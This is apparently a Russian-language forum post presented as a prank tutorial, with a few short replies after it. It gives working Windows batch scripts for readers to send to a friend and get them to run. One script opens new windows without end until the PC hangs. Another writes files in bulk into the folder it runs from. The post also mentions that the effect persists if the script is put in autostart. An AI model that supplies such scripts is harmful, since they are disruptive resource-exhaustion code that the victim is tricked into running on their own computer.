Хотите прикол над друзьями
Сразу говорю тот кто знает можете не писать и не пишите мне что по типу "это просто, это фигня, это и так знаю" такое не писать если есть дикое желание это написать то скипните это, я пишу для людей которые хотят маленький прикол, а не знают как:
Открываем блокнот и пишем:
@echo off
color 2
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top
(после "color" можете любую цифру это типо цвет шрифта и фона в данном случае черный фон и зелёный шрифт)
Далее сохраняем файл и пишем название к примеру 1.bat(.bat обязательно чтобы работало)
Далее создаём новый текстовый документ (с любым названием)
и пишем :x Start (название файла) goto:x получится должно что типо:
:x
Start 1
goto:x
сохраняем "название".bat
отсылаем другу 2 эти 2 файла и говорим что бы он запустил
у него запуститься бесконечное количество окон с рандомными числами тем самым у него залагает пк(после перезагрузки или перевключения все станет нормально если он это в автозагрузку не поставит)
Так же можно кое что еще сделать пожёстче:
опять же блокнот>команда:
@echo off
color 2
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top
"название".bat
и теперь добавим ещё команду:
for /l %%n in (1,1,количество) do имя >> имя%%n.txt
"название2".bat
(создаёт указанное количество файлов с любым указанным именем в папке где запущен этот файл)
и последнее
блокнот>команда:
:x
Start название2
Start название
goto:x
"название3".bat
кидаем 3 файла другу и пускай запускает "название3"
Всё)
(Ещё раз повторяю для гениев не пишите мне тут типо: удивил, гений, и тп конечно людей которые понимают в командах Windows я не удивлю я пишу для тех кто хочет пранк над другом но не знает как, а в интернете искать лень, всё объяснил надеюсь не будет таких "умных" которые будут всякий бред нести который я перечислил выше)
Дополню тем что, работает это только на пк и на операционной системе Windows(команды в зависимости от версии винды вроде не менялись)
а он нас не хочет
Очень смешно!
нет не хочу